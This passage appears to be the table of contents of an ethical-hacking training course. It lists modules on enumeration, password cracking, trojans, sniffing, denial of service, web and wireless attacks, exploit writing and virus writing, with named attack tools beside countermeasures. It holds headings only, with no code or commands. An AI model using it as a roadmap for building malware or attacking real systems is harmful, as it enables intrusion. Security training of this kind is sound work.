o Draw network diagrams of Vulnerable hosts
• Cheops
• FriendlyPinger
o Prepare proxies
• Proxy Servers
• Use of Proxies for Attack
• SocksChain
• Proxy Workbench
• ProxyManager Tool
• Super Proxy Helper Tool
• Happy Browser Tool (Proxy-based)
• MultiProxy
• TOR Proxy Chaining Software
o Anonymizers
• Primedius Anonymizer
• Browzar
• Torpark Browser
• G-Zapper - Google Cookies
o SSL Proxy Tool
o HTTP Tunneling Techniques
o HTTPort
o Spoofing IP Address - Source Routing
o Detecting IP Spoofing
o Despoof Tool
o Scanning Countermeasures
o Tool: SentryPC
Module 4: Enumeration
Overview of System Hacking Cycle
What is Enumeration?
Techniques for Enumeration
NetBIOS Null Sessions
Tools
o DumpSec
o NetBIOS Enumeration Using Netview
o Nbtstat
o SuperScan4
o Enum
o sid2user
o user2sid
o GetAcct
Null Session Countermeasures
PSTools
o PsExec
o PsFile
o PsGetSid
o PsKill
o PsInfo
o PsList
o PsLoggedOn
o PsLogList
o PsPasswd
o PsService
o PsShutdown
o PsSuspend
o PsUptime
SNMP Enumeration
Management Information Base
Tools
o SNMPutil
o Solarwinds
o SNScan V1.05
o Getif SNMP MIB Browser
UNIX Enumeration
SNMP UNIX Enumeration
SNMP Enumeration Countermeasures
Tools
o Winfingerprint
o Windows Active Directory Attack Tool
o IP Tools Scanner
o Enumerate Systems Using Default Passwords
Steps to Perform Enumeration
Module 5: System Hacking
Cracking Passwords
o Password Types
o Types of Password Attacks
o Passive Online – Wire Sniffing
o Passive Online Attacks
o Active Online – Password Guessing
o Offline Attacks
• Dictionary Attack
• Hybrid Attack
• Brute-force Attack
• Pre-computed Hashes
o Non-Technical Attacks
o Password Mitigation
o Permanent Account Lockout – Employee Privilege Abuse
o Administrator Password Guessing
o Manual Password Cracking Algorithm
o Automatic Password Cracking Algorithm
o Performing Automated Password Guessing
o Tools
• NAT
• Smbbf (SMB Passive Brute Force Tool)
• SmbCrack Tool
• Legion
• L0phtCrack
o Microsoft Authentication - LM, NTLMv1, and NTLMv2
o Kerberos Authentication
o What is LAN Manager Hash?
o Salting
o Tools
• PWdump2 and Pwdump3
• Rainbowcrack
• KerbCrack
• NBTDeputy
• NetBIOS DoS Attack
• John the Ripper
o Password Sniffing
o How to Sniff SMB Credentials?
o Sniffing Hashes Using L0phtCrack
o Tools
• ScoopLM
• SMB Replay Attacks
• Replay Attack Tool: SMBProxy
• Hacking Tool: SMB Grind
• Hacking Tool: SMBDie
o SMBRelay Weaknesses & Countermeasures
o Password Cracking Countermeasures
o LM Hash Backward Compatibility
o How to Disable LM HASH?
o Tools
• Password Brute-Force Estimate Tool
• Syskey Utility
Escalating Privileges
o Privilege Escalation
o Cracking NT/2000 Passwords
o Active@ Password Changer
o Change Recovery Console Password
o Privilege Escalation Tool: x.exe
Executing applications
o Tools:
• Psexec
• Remoexec
• Alchemy Remote Executor
• Keystroke Loggers
• E-mail Keylogger
• Spytector FTP Keylogger
• IKS Software Keylogger
• Ghost Keylogger
• Hardware Keylogger
• Keyboard Keylogger: KeyGhost Security Keyboard
• USB Keylogger: KeyGhost USB Keylogger
o What is Spyware?
o Tools
• Spyware: Spector
• Remote Spy
• eBlaster
• Stealth Voice Recorder
• Stealth Keylogger
• Stealth Website Logger
• Digi-Watcher Video Surveillance
• Desktop Spy Screen Capture Program
• Telephone Spy
• Print Monitor Spy Tool
• Perfect Keylogger
• Stealth Email Redirector
• Spy Software: Wiretap Professional
• Spy Software: FlexiSpy
• PC PhoneHome
o Keylogger Countermeasures
o Anti-Keylogger
o PrivacyKeyboard
Hiding Files
o Hacking Tool: RootKit
o Why Rootkits?
o Rootkits in Linux
o Detecting Rootkits
o Rootkit Detection Tools
• BlackLight from F-Secure Corp
• RootkitRevealer from Sysinternals
• Malicious Software Removal Tool from Microsoft Corp
o Sony Rootkit Case Study
o Planting the NT/2000 Rootkit
o Rootkits
• Fu
• AFX Rootkit 2005
• Nuclear
• Vanquish
o Rootkit Countermeasures
o Patchfinder2.0
o RootkitRevealer
o Creating Alternate Data Streams
o How to Create NTFS Streams?
o NTFS Stream Manipulation
o NTFS Streams Countermeasures
o NTFS Stream Detectors
• ADS Spy
• ADS Tools
o What is Steganography?
o Tools
• Merge Streams
• Invisible Folders
• Invisible Secrets 4
• Image Hide
• Stealth Files
• Steganography
• Masker Steganography Tool
• Hermetic Stego
• DCPP – Hide an Operating System
• Camera/Shy
• Mp3Stego
• Snow.exe
o Video Steganography
o Steganography Detection
o SIDS (Stego Intrusion Detection System)
o High-Level View
o Tool: dskprobe.exe
Covering tracks
o Disabling Auditing
o Clearing the Event Log
o Tools
• elsave.exe
• Winzapper
• Evidence Eliminator
• Traceless
• Tracks Eraser Pro
• ZeroTracks
Module 6: Trojans and Backdoors
Introduction
Effect on Business
What is a Trojan?
Overt and Covert Channels
Working of Trojans
Different Types of Trojans
What Do Trojan Creators Look For?
Different Ways a Trojan Can Get into a System
Indications of a Trojan Attack
Ports Used by Trojans
How to Determine which Ports are “Listening”?
Classic Trojans Found in the Wild
Trojans
o Tini
o iCmd
o NetBus
o Netcat
o Beast
o MoSucker
o Proxy Server
o SARS Trojan Notification
Wrappers
Wrapper Covert Program
Wrapping Tools
o One file EXE Maker
o Yet Another Binder
o Pretator Wrapper
Packaging Tool: WordPad
RemoteByMail
Tool: Icon Plus
Defacing Application: Restorator
HTTP Trojans
Trojan Attack through Http
HTTP Trojan (HTTP RAT)
Shttpd Trojan - HTTP Server
Reverse Connecting Trojans
Nuclear RAT Trojan (Reverse Connecting)
Tool: BadLuck Destructive Trojan
ICMP Tunneling
ScreenSaver Password Hack Tool – Dummylock
Trojan
o Phatbot
o Amitis
o Senna Spy
o QAZ
o Back Orifice
o Back Orifice 2000
o SubSeven
o CyberSpy Telnet Trojan
o Subroot Telnet Trojan
o Let Me Rule! 2.0 BETA 9
o Donald Dick
o RECUB
Hacking Tool: Loki
Atelier Web Remote Commander
Trojan Horse Construction Kit
How to Detect Trojans?
Tools
o Netstat
o fPort
o TCPView
o CurrPorts
o Process Viewer
o What’s on My Computer
o Super System Helper
Delete Suspicious Device Drivers
Inzider - Tracks Processes and Ports
Tools
o What's Running?
o MSConfig
o Registry - What’s Running
o Autoruns
o Hijack This (System Checker)
o Startup List
Anti-Trojan Software
Evading Anti-Virus Techniques
Evading Anti-Trojan/Anti-Virus Using Stealth Tools v2.0
Backdoor Countermeasures
Tools
o Tripwire
o System File Verification
o MD5sum.exe
o Microsoft Windows Defender
How to Avoid a Trojan Infection?
Module 7: Sniffers
Definition of Sniffing
Protocols Vulnerable to Sniffing
o Tool: Network View – Scans the Network for Devices
o The Dude Sniffer
o Ethereal
o tcpdump
Types of Sniffing
o Passive Sniffing
o Active sniffing
ARP - What is Address Resolution Protocol?
ARP Spoofing Attack
o How Does ARP Spoofing Work?
o ARP Poisoning
o MAC Duplicating Attack
Tools for ARP Spoofing
o Arpspoof (Linux-based tool)
o Ettercap (Linux and Windows)
MAC Flooding
Tools for MAC Flooding
o Macof (Linux-based tool)
o Etherflood (Linux and Windows)
Threats of ARP Poisoning
IRS – ARP Attack Tool
ARPWorks Tool
Tool: Nemesis
Sniffer Hacking Tools (dsniff package)
o Arpspoof
o Dnsspoof
o Dsniff
o Filesnarf
o Mailsnarf
o Msgsnarf
o Tcpkill
o Tcpnice
o Urlsnarf
o Webspy
o Webmitm
DNS Poisoning Techniques
Types of DNS Poisoning:
o Intranet DNS Spoofing (Local network)
o Internet DNS Spoofing (Remote network)
o Proxy Server DNS Poisoning
o DNS Cache Poisoning
Interactive TCP Relay
Sniffers
o HTTP Sniffer: EffeTech
o Ace Password Sniffer
o MSN Sniffer
o SmartSniff
o Session Capture Sniffer: NetWitness
o Session Capture Sniffer: NWreader
o Cain and Abel
o Packet Crafter Craft Custom TCP/IP Packets
o SMAC
o NetSetMan Tool
o Raw Sniffing Tools
o Sniffit
o Aldebaran
o Hunt
o NGSSniff
o Ntop
o Pf
o IPTraf
o EtherApe
o Netfilter
o Network Probe
o Maa Tec Network Analyzer
Tools
o Snort
o Windump
o Etherpeek
o Mac Changer
o Iris
o NetIntercept
o WinDNSSpoof
How to Detect Sniffing?
AntiSniff Tool
ArpWatch Tool
Countermeasures
Module 8: Denial of Service
What are Denial of Service Attacks?
Goal of DoS
Impact and the Modes of Attack
Types of Attacks
o DoS attack
o DDoS attack
DoS Attack Classification
o Smurf
o Buffer Overflow Attack
o Ping of death
o Teardrop
o SYN Attack
DoS Attack Tools
o Jolt2
o Bubonic.c
o Land and LaTierra
o Targa
o Blast20
o Nemesy
o Panther2
o Crazy Pinger
o Some Trouble
o UDP Flood
o FSMax
Botnets
Uses of botnets
Types of Bots
o Agobot/Phatbot/Forbot/XtremBot
o SDBot/RBot/UrBot/UrXBot
o mIRC-based Bots - GT-Bots
Tool: Nuclear Bot
What is DDoS Attack?
Characteristics of DDoS Attacks
DDOS Unstoppable
Agent Handler Model
DDoS IRC based Model
DDoS Attack Taxonomy
Amplification Attack
Reflective DNS Attacks
Reflective DNS Attacks Tool: ihateperl.pl
DDoS Tools
o Trin00
o Tribe Flood Network (TFN)
o TFN2K
o Stacheldraht
o Shaft
o Trinity
o Knight
o Mstream
o Kaiten
Worms
Slammer Worm
Spread of Slammer Worm – 30 min
MyDoom.B
SCO Against MyDoom Worm
How to Conduct a DDoS Attack
The Reflected DoS Attacks
Reflection of the Exploit
Countermeasures for Reflected DoS
DDoS Countermeasures
Taxonomy of DDoS Countermeasures
Preventing Secondary Victims
Detect and Neutralize Handlers
Detect Potential Attacks
Mitigate or Stop the Effects of DDoS Attacks
Deflect Attacks
Post-attack Forensics
Packet Traceback
Module 9: Social Engineering
What is Social Engineering?
Human Weakness
“Rebecca” and “Jessica”
Office Workers
Types of Social Engineering
o Human-based
o Computer-based
Preventing Insider Threat
Common Targets of Social Engineering
Factors that make Companies Vulnerable to Attacks
Why is Social Engineering Effective?
Warning Signs of an Attack
Tool: Netcraft Anti-Phishing Toolbar
Phases in a Social Engineering Attack
Behaviors Vulnerable to Attacks
Impact on the Organization
Countermeasures
Policies and Procedures
Security Policies - Checklist
Phishing Attacks and Identity Theft
What is Phishing?
Phishing Report
Attacks
Hidden Frames
URL Obfuscation
URL Encoding Techniques
IP Address to Base 10 Formula
Karen’s URL Discombobulator
HTML Image Mapping Techniques
Fake Browser Address Bars
Fake Toolbars
Fake Status Bar
DNS Cache Poisoning Attack
Module 10: Session Hijacking
What is Session Hijacking?
Spoofing vs. Hijacking
Steps in Session Hijacking
Types of Session Hijacking
o Active
o Passive
The 3-Way Handshake
TCP Concepts 3-Way Handshake
Sequence Number Prediction
TCP/IP Hijacking
RST Hijacking
RST Hijacking Tool: hijack_rst.sh
Programs that Perform Session Hijacking
Hacking Tools
o Juggernaut
o Hunt
o TTY Watcher
o IP Watcher
o T-Sight
o Paros HTTP Session
Remote TCP Session Reset Utility
Dangers Posed by Hijacking
Protecting against Session Hijacking
Countermeasure: IP Security
IP-SEC
Module 11: Hacking Web Servers
How Web Servers Work
How are Web Servers Compromised?
How are Web Servers Defaced?
Apache Vulnerability
Attacks Against IIS
o IIS Components
o IIS Directory Traversal (Unicode) Attack
Unicode
o Unicode Directory Traversal Vulnerability
Hacking Tool: IISxploit.exe
Msw3prt IPP Vulnerability
WebDAV / ntdll.dll Vulnerability
RPC DCOM Vulnerability
ASN Exploits
ASP Trojan (cmd.asp)
IIS Logs
Network Tool: Log Analyzer
Hacking Tool: CleanIISLog
Unspecified Executable Path Vulnerability
Metasploit Framework
Immunity CANVAS Professional
Core Impact
Hotfixes and Patches
What is Patch Management?
Solution: UpdateExpert
Patch Management Tool
o Qfecheck
o HFNetChk
cacls.exe Utility
Vulnerability Scanners
Online Vulnerability Search Engine
Network Tools
o Whisker
o N-Stealth HTTP Vulnerability Scanner
Hacking Tool: WebInspect
Network Tool: Shadow Security Scanner
SecureIIS
Countermeasures
File System Traversal Countermeasures
Increasing Web Server Security
Web Server Protection Checklist
Module 12: Web Application Vulnerabilities
Web Application Setup
Web Application Hacking
Anatomy of an Attack
Web Application Threats
Cross-Site Scripting/XSS Flaws
o Countermeasures
SQL Injection
Command Injection Flaws
o Countermeasures
Cookie/Session Poisoning
o Countermeasures
Parameter/Form Tampering
Buffer Overflow
o Countermeasures
Directory Traversal/Forceful Browsing
o Countermeasures
Cryptographic Interception
Cookie Snooping
Authentication Hijacking
o Countermeasures
Log Tampering
Error Message Interception
Attack Obfuscation
Platform Exploits
DMZ Protocol Attacks
o Countermeasures
Security Management Exploits
Web Services Attacks
Zero-Day Attacks
Network Access Attacks
TCP Fragmentation
Hacking Tools
o Instant Source
o Wget
o WebSleuth
o BlackWidow
o WindowBomb
o Burp
o cURL
o dotDefender
o Google Hacking
o Acunetix Web Scanner
o AppScan – Web Application Scanner
o AccessDiver
Module 13: Web-based Password Cracking Techniques
Definition of Authentication
Authentication Mechanisms
o HTTP Authentication
• Basic Authentication
• Digest Authentication
o Integrated Windows (NTLM) Authentication
o Negotiate Authentication
o Certificate-based Authentication
o Forms-based Authentication
o RSA Secure Token
o Biometrics
• Face recognition
• Iris scanning
• Retina scanning
• Fingerprinting
• Hand geometry
• Voice recognition
How to Select a Good Password?
Things to Avoid in Passwords
Changing Your Password
Protecting Your Password
How Do Hackers Get Hold of Passwords?
Windows XP: Remove Saved Passwords
Microsoft Password Checker
What is a Password Cracker?
Modus Operandi of an Attacker Using Password Cracker
How does a Password Cracker Work?
Classification of Attacks
Password Guessing
Query String
Cookies
Dictionary Maker
Available Password Crackers
o L0phtCrack
o John The Ripper
o Brutus
Hacking Tools
o Obiwan
o Authforce
o Hydra
o Cain And Abel
o RAR
o Gammaprog
o WebCracker
o Munga Bunga
o PassList
o SnadBoy
o WinSSLMiM
o ReadCookies.html
o Wireless WEP Key Password Spy
o RockXP
o Password Spectator
Countermeasures
Module 14: SQL Injection
Introducing SQL injection
Exploiting Web Applications
SQL Injection Steps
o What Should You Look For?
o What If It Doesn’t Take Input?
o OLE DB Errors
o Input Validation Attack
SQL Injection Techniques
How to Test for SQL Injection Vulnerability?
How does it Work?
Executing Operating System Commands
Getting Output of SQL Query
Getting Data from the Database Using ODBC Error Message
How to Mine all Column Names of a Table?
How to Retrieve any Data?
How to Update/Insert Data into Database?
Automated SQL Injection Tool
o AutoMagic SQL
o Absinthe
SQL Injection in Oracle
SQL Injection in MySql Database
Attack against SQL Servers
SQL Server Resolution Service (SSRS)
Osql -L Probing
SQL Injection Automated Tools
o SQLDict
o SqlExec
o SQLbf
o SQLSmack
o SQL2.exe
SQL Injection Countermeasures
Preventing SQL Injection Attacks
SQL Injection Blocking Tool: SQLBlock
Acunetix Web Vulnerability Scanner
Module 15: Hacking Wireless Networks
Introduction to Wireless Networking
Wired Network vs. Wireless Network
Effects of Wireless Attacks on Business
Types of Wireless Networks
Advantages and Disadvantages of a Wireless Network
Wireless Standards
o 802.11a
o 802.11b – “WiFi”
o 802.11g
o 802.11i
o 802.11n
Related Technology and Carrier Networks
Antennas
Cantenna
Wireless Access Points
SSID
Beacon Frames
Is the SSID a Secret?
Setting Up a WLAN
Detecting a Wireless Network
How to Access a WLAN
Terminologies
Authentication and Association
Authentication Modes
Authentication and (Dis)Association Attacks
Rogue Access Points
Tools to Generate Rogue Access Points: Fake AP
Tools to Detect Rogue Access Points: Netstumbler
Tools to Detect Rogue Access Points: MiniStumbler
Wired Equivalent Privacy (WEP)
What is WPA?
WPA Vulnerabilities
WEP, WPA, and WPA2
Steps for Hacking Wireless Networks
o Step 1: Find networks to attack
o Step 2: Choose the network to attack
o Step 3: Analyze the network
o Step 4: Crack the WEP key
o Step 5: Sniff the network
Cracking WEP
Weak Keys (a.k.a. Weak IVs)
Problems with WEP’s Key Stream and Reuse
Automated WEP Crackers
Pad-Collection Attacks
XOR Encryption
Stream Cipher
WEP Tools
o Aircrack
o AirSnort
o WEPCrack
o WepLab
Temporal Key Integrity Protocol (TKIP)
LEAP: The Lightweight Extensible Authentication Protocol
LEAP Attacks
MAC Sniffing and AP Spoofing
Tool to Detect MAC Address Spoofing: Wellenreiter V2
Man-in-the-Middle Attack (MITM)
Denial-of-Service Attacks
DoS Attack Tool: Fatajack
Phone Jammers
Scanning Tools
o Redfang 2.5
o Kismet
o THC-WarDrive
o PrismStumbler
o MacStumbler
o Mognet
o WaveStumbler
o StumbVerter
o Netchaser V1.0 for Palm Tops
o AP Scanner
o SSID Sniff
o Wavemon
o Wireless Security Auditor (WSA)
o AirTraf
o Wifi Finder
o AirMagnet
Sniffing Tools
o AiroPeek
o NAI Wireless Sniffer
o Ethereal
o Aerosol v0.65
o vxSniffer
o EtherPEG
o DriftNet
o AirMagnet
o WinDump
o ssidsniff
Multiuse Tool: THC-RUT
PCR-PRO-1k Hardware Scanner
Tools
o WinPcap
o AirPcap
Securing Wireless Networks
Auditing Tool: BSD-Airtools
AirDefense Guard
WIDZ: Wireless Intrusion Detection System
Radius: Used as Additional Layer in Security
Google Secure Access
Module 16: Virus and Worms
Introduction to Virus
Virus History
Characteristics of a Virus
Working of Virus
o Infection Phase
o Attack Phase
Why Do People Create Computer Viruses?
Symptoms of Virus-Like Attack
Virus Hoaxes
Chain Letters
How is a Worm different from a Virus?
Indications of Virus Attack
Hardware Threats
Software Threats
Virus Damage
Modes of Virus Infection
Stages of Virus Life
Virus Classification
How does a Virus Infect?
Storage Patterns of a Virus
System Sector Viruses
Stealth Virus
Bootable CD-ROM Virus
Self-Modification
Encryption with a Variable Key
Polymorphic Code
Viruses
o Metamorphic Virus
o Cavity Virus
o Sparse Infector Virus
o Companion Virus
o File Extension Virus
o I Love You Virus
o Melissa Virus
Famous Virus/Worms – JS.Spth
Klez Virus Analysis
Writing a Simple Virus Program
Virus Construction Kits
Virus Detection Methods
Virus Incident Response
What is Sheep Dip?
Sheep Dip Computer
Virus Analysis - IDA Pro Tool
Prevention is Better than Cure
Latest Viruses
Top 10 Viruses- 2006
Anti-Virus Software
o AVG Free Edition
o Norton Antivirus
o McAfee
Socketshield
Popular Anti-Virus Packages
Virus Databases
Module 17: Physical Security
Security Statistics
Physical Security Breach Incidents
Understanding Physical Security
What Is the Need for Physical Security?
Who Is Accountable for Physical Security?
Factors Affecting Physical Security
Physical Security Checklist
o Company surroundings
o Premises
o Reception
o Server
o Workstation area
o Wireless access points
o Other equipment, such as fax, and removable media
o Access control
o Biometric Devices
o Smart Cards
o Security Token
o Computer equipment maintenance
o Wiretapping
o Remote access
o Locks
Information Security
EPS (Electronic Physical Security)
Wireless Security
Laptop Theft: Security Statistics
Laptop Theft
Laptop Security Tools
Laptop Tracker - XTool Computer Tracker
Tools to Locate Stolen Laptops
Stop's Unique, Tamper-proof Patented Plate
Tool: TrueCrypt
Laptop Security Countermeasures
Mantrap
TEMPEST
Challenges in Ensuring Physical Security
Spyware Technologies
Spying Devices
Physical Security: Lock Down USB Ports
Tool: DeviceLock
Blocking the Use of USB Storage Devices
Track Stick GPS Tracking Device
Module 18: Linux Hacking
Why Linux?
Linux Distributions
Linux – Basics
Linux Live CD-ROMs
Basic Commands of Linux
Linux File Structure
Linux Networking Commands
Directories in Linux
Compiling the Linux Kernel
How to Install a Kernel Patch?
Compiling Programs in Linux
GCC Commands
Make Install Command
Linux Vulnerabilities
Chrooting
Why is Linux Hacked?
Linux Vulnerabilities in 2005
How to Apply Patches to Vulnerable Programs?
Scanning Networks
Tools
o Nmap in Linux
o Scanning Tool: Nessus
o Tool: Cheops
o Port Scan Detection Tools
Password Cracking in Linux
Firewall in Linux: IPTables
Basic Linux Operating System Defense
SARA (Security Auditor's Research Assistant)
Linux Tool
o Netcat
o tcpdump
o Snort
o SAINT
o Ethereal
o Abacus Port Sentry
o DSniff Collection
o Hping2
o Sniffit
o Nemesis
o LSOF
o IPTraf
o LIDS
o Hunt
o TCP Wrappers
Linux Loadable Kernel Modules
Hacking Tool: Linux Rootkits
Rootkits
o Knark
o Torn
o Tuxit
o Adore
o Ramen
o Beastkit
Rootkit Countermeasures
Linux Tools: Application Security
Advanced Intrusion Detection Environment (AIDE)
Linux Tools
o Security Testing Tools
o Encryption
o Log and Traffic Monitors
o Security Auditing Tool (LSAT)
Linux Security Countermeasures
Steps for Hardening Linux
Module 19: Evading IDS, Firewalls, and Honeypots
Introduction to Intrusion Detection Systems
Terminologies
o Intrusion Detection System (IDS)
• IDS Placement
• Ways to Detect an Intrusion
• Types of Intrusion Detection Systems
• System Integrity Verifiers (SIV)
• Tripwire
• Cisco Security Agent (CSA)
• Signature Analysis
• General Indications of Intrusion System Indications
• General Indications of Intrusion File System Indications
• General Indications of Intrusion Network Indications
• Intrusion Detection Tools
• Snort 2.x
• Steps to Perform After an IDS Detects an Attack
• Evading IDS Systems
• Ways to Evade IDS
• Tools to Evade IDS
• IDS Evading Tool: ADMutate
• Packet Generators
o Firewall
• What is a Firewall?
• What does a Firewall do?
• Packet Filtering
• What can't a Firewall do?
• How does a Firewall Work?
• Firewall Operations
• Hardware Firewall
• Software Firewall
• Types of Firewalls
• Packet Filtering Firewall
• IP Packet Filtering Firewall
• Circuit-Level Gateway
• TCP Packet Filtering Firewall
• Application-Level Firewall
• Application Packet Filtering Firewall
• Stateful Multilayer Inspection Firewall
• Firewall Identification
• Firewalking
• Banner Grabbing
• Breaching Firewalls
• Bypassing a Firewall Using HTTP Tunnel
• Placing Backdoors Through Firewalls
• Hiding behind a Covert Channel: LOKI
• ACK Tunneling
• Tools to Breach Firewalls
• Common Tool for Testing Firewall & IDS
• IDS Informer
• Evasion Gateway
• Firewall Informer
o Honeypot
• What is a Honeypot?
• The Honeynet Project
• Types of Honeypots
• Advantages and Disadvantages of a Honeypot
• Where to Place a Honeypot?
• Honeypots
• SPECTER
• honeyd
• KFSensor
• Sebek
• Physical and Virtual Honeypots
• Tools to Detect Honeypots
• What to do When Hacked?
Module 20: Buffer Overflows
Why are Programs/Applications Vulnerable?
Buffer Overflows
Reasons for Buffer Overflow Attacks
Knowledge Required to Program Buffer Overflow Exploits
Types of Buffer Overflows
o Stack-based Buffer Overflow
• Understanding Assembly Language
• Understanding Stacks
• Shellcode
o Heap/BSS-based Buffer Overflow
How to Detect Buffer Overflows in a Program
Attacking a Real Program
NOPS
How to Mutate a Buffer Overflow Exploit
Defense Against Buffer Overflows
Tool to Defend Buffer Overflow
o Return Address Defender (RAD)
o StackGuard
o Immunix System
Vulnerability Search – ICAT
Simple Buffer Overflow in C
Code Analysis
Module 21: Cryptography
Public-key Cryptography
Working of Encryption
Digital Signature
RSA (Rivest Shamir Adleman)
RC4, RC5, RC6, Blowfish
Algorithms and Security
Brute-Force Attack
RSA Attacks
Message Digest Functions
One-way Hash Functions
MD5
SHA (Secure Hash Algorithm)
SSL (Secure Sockets Layer)
RC5
What is SSH?
SSH (Secure Shell)
Government Access to Keys (GAK)
RSA Challenge
distributed.net
Cleversafe Grid Builder
PGP (Pretty Good Privacy)
Code Breaking: Methodologies
Cryptography Attacks
Disk Encryption
Hacking Tool
o PGP Crack
o Magic Lantern
o WEPCrack
o Cracking S/MIME Encryption Using Idle CPU Time
o CypherCalc
o Command Line Scriptor
o CryptoHeaven
Module 22: Penetration Testing
Introduction to Penetration Testing
Categories of Security Assessments
Vulnerability Assessment
Limitations of Vulnerability Assessment
Types of Penetration Testing
Risk Management
Do-it-Yourself Testing
Outsourcing Penetration Testing Services
Terms of Engagement
Project Scope
Pentest Service Level Agreements
Testing Points
Testing Locations
Automated Testing
Manual Testing
Using DNS Domain Name and IP Address Information
Enumerating Information about Hosts on Publicly-Available Networks
Testing Network-Filtering Devices
Enumerating Devices
Denial of Service Emulation
Tools
o Appscan
o HackerShield
o Cerberus Internet Scanner
o Cybercop Scanner
o FoundScan Hardware Appliances
o Nessus
o NetRecon
o SAINT
o SecureNET Pro
o SecureScan
o SATAN
o SARA
o Security Analyzer
o STAT Analyzer
o VigilENT
o WebInspect
Evaluating Different Types of Pentest Tools
Asset Audit
Fault Trees and Attack Trees
GAP Analysis
Threat
Business Impact of Threat
Internal Metrics Threat
External Metrics Threat
Calculating Relative Criticality
Test Dependencies
Defect Tracking Tools
o Web-based Bug/Defect Tracking Software
o SWB Tracker
o Advanced Defect Tracking Web Edition
Disk Replication Tools
o Snapback DUP
o Daffodil Replicator
o Image MASSter 4002i
DNS Zone Transfer Testing Tools
o DNS analyzer
o Spam blacklist
Network Auditing Tools
o eTrust Audit (AUDIT LOG REPOSITORY)
o iInventory
o Centennial Discovery
Trace Route Tools and Services
o IP Tracer 1.3
o Trellian Trace Route
Network Sniffing Tools
o Sniff’em
o PromiScan
Denial-of-Service Emulation Tools
o FlameThrower®
o Mercury LoadRunner™
o ClearSight Analyzer
Traditional Load Testing Tools
o WebMux
o SilkPerformer
o PORTENT Supreme
System Software Assessment Tools
o Database Scanner
o System Scanner
o Internet Scanner
Operating System Protection Tools
o Bastille Linux
o Engarde Secure Linux
Fingerprinting Tools
o Foundstone
o @Stake LC 5
Port Scanning Tools
o Superscan
o Advanced Port Scanner
o AW Security Port Scanner
Directory and File Access Control Tools
o Abyss Web Server for Windows
o GFI LANguard Portable Storage Control
o Windows Security Officer - wso
File Share Scanning Tools
o Infiltrator Network Security Scanner
o Encrypted FTP 3
Password Directories
o Passphrase Keeper 2.60
o IISProtect
Password Guessing Tools
o Webmaster Password Generator
o Internet Explorer Password Recovery Master
o Password Recovery Toolbox
Link Checking Tools
o Alert Link Runner
o Link Utility
o LinxExplorer
Web Testing-based Scripting Tools
o Svoi.NET PHP Edit
o OptiPerl
o Blueprint Software Web Scripting Editor
Buffer Overflow Protection Tools
o StackGuard
o FormatGuard
o RaceGuard
File Encryption Tools
o Maxcrypt
o Secure IT
o Steganos
Database Assessment Tools
o EMS MySQL Manager
o SQL Server Compare
o SQL Stripes
Keyboard Logging and Screen Recording Tools
o Spector Professional 5.0
o Handy Keylogger
o Snapshot Spy
System Event Logging and Reviewing Tools
o LT Auditor Version 8.0
o ZVisual RACF
o Network Intelligence Engine LS Series
Tripwire and Checksum Tools
o SecurityExpressions
o MD5
o Tripwire for Servers
Mobile-Code Scanning Tools
o Vital Security
o E Trust Secure Content Manager 1.1
o Internet Explorer Zones
Centralized Security Monitoring Tools
o ASAP eSMART™ Software Usage by ASAP Software
o WatchGuard VPN Manager
o Harvester
Web Log Analysis Tools
o AWStats
o Azure Web Log
o Summary
Forensic Data and Collection Tools
o Encase tool
o SafeBack
o ILook Investigator
Security Assessment Tools
o Nessus Windows Technology
o NetIQ Security Manager
o STAT Scanner
Multiple OS Management Tools
o Multiple Boot Manager
o Acronis OS Selector
o Eon
Phases of Penetration Testing
o Pre-Attack Phase
o Attack Phase
o Post-Attack Phase
Penetration Testing Deliverables Templates
SELF-STUDY MODULES
Covert Hacking
Insider attacks
What is a Covert Channel?
Security Breach
Why Do You Want to Use Covert Channel?
Motivation of a Firewall Bypass
Covert Channels Scope
Covert Channel: Attack Techniques
Simple Covert Attacks
Advanced Covert Attacks
Reverse Connecting Agents
Covert Channel Attack Tools
o Netcat
o DNS tunnel
o DNS Tunneling
• Covert Channel Using DNS Tunneling
• DNS Tunnel Client
• DNS Tunneling Countermeasures
o SSH reverse tunnel
• Covert Channel Using SSH
• Covert Channel using SSH (Advanced)
o HTTP/S Tunneling Attack
o Covert Channel Hacking Tool: Active Port Forwarder
o Covert Channel Hacking Tool: CCTT
o Covert Channel Hacking Tool: Firepass
o Covert Channel Hacking Tool: MsnShell
o Covert Channel Hacking Tool: Web Shell
o Covert Channel Hacking Tool: NCovert
o Covert Channel Hacking via Spam E-mail Messages
o Hydan
o Covert Channel Hacking Tool: NCOVERT
Writing Virus Codes
Introduction to Viruses
Types of Viruses
Symptoms of a Virus Attack
Prerequisites for Writing Viruses
Required Tools and Utilities
Virus Infection Flow Chart
o Step – I Finding file to infect
• Directory Traversal Method
• “dot dot” Method
o Step – II Check virus infection criteria
o Step – III Check for previous infection
• Marking a File for Infection
o Step – IV Infect the file
o Step – V Covering tracks
Components of Viruses
Functioning of the Replicator Part
Diagrammatical representation
Writing Replicator
Writing Concealer
Dispatcher
Writing Bomb/Payload
Trigger Mechanism
Brute Force Logic Bombs
Testing Virus Codes
Tips for Better Virus Writing
Assembly Language Tutorial
Number System
Base 10 System
Base 2 System
Decimal 0 to 15 in Binary
Binary Addition (C stands for Carry)
Hexadecimal Number
Hex Example
Hex Conversion
Nibble
Computer memory
Characters Coding
ASCII and UNICODE
CPU
Machine Language
Compilers
Clock Cycle
Original Registers
Instruction Pointer
Pentium Processor
Interrupts
Interrupt handler
External interrupts and Internal interrupts
Handlers
Machine Language
Assembly Language
Assembler
Assembly Language Vs High-level Language
Assembly Language Compilers
Instruction operands
MOV instruction
ADD instruction
SUB instruction
INC and DEC instructions
Directive
Preprocessor
equ directive
%define directive
Data directives
Labels
Input and output
C Interface
Call
Creating a Program
Why should anyone learn assembly at all?
o First.asm
Assembling the code
Compiling the C code
Linking the object files
Understanding an assembly listing file
Big and Little Endian Representation
Skeleton File
Working with Integers
Signed integers
Signed Magnitude
Two’s Complement
If statements
Do while loops
Indirect addressing
Subprogram
The Stack
The SS segment
ESP
The Stack Usage
The CALL and RET Instructions
General subprogram form
Local variables on the stack
General subprogram form with local variables
Multi-module program
Saving registers
Labels of functions
Calculating addresses of local variables
Exploit Writing
Exploits Overview
Prerequisites for Writing Exploits and Shellcodes
Purpose of Exploit Writing
Types of Exploits
o Stack Overflow
o Heap Corruption
o Format String
o Integer Bug Exploits
o Race Condition
o TCP/IP Attack
The Proof-of-Concept and Commercial Grade Exploit
Converting a Proof of Concept Exploit to Commercial Grade Exploit
Attack Methodologies
Socket Binding Exploits
Tools for Exploit Writing
o LibExploit
o Metasploit
o CANVAS
Steps for Writing an Exploit
Differences Between Windows and Linux Exploits
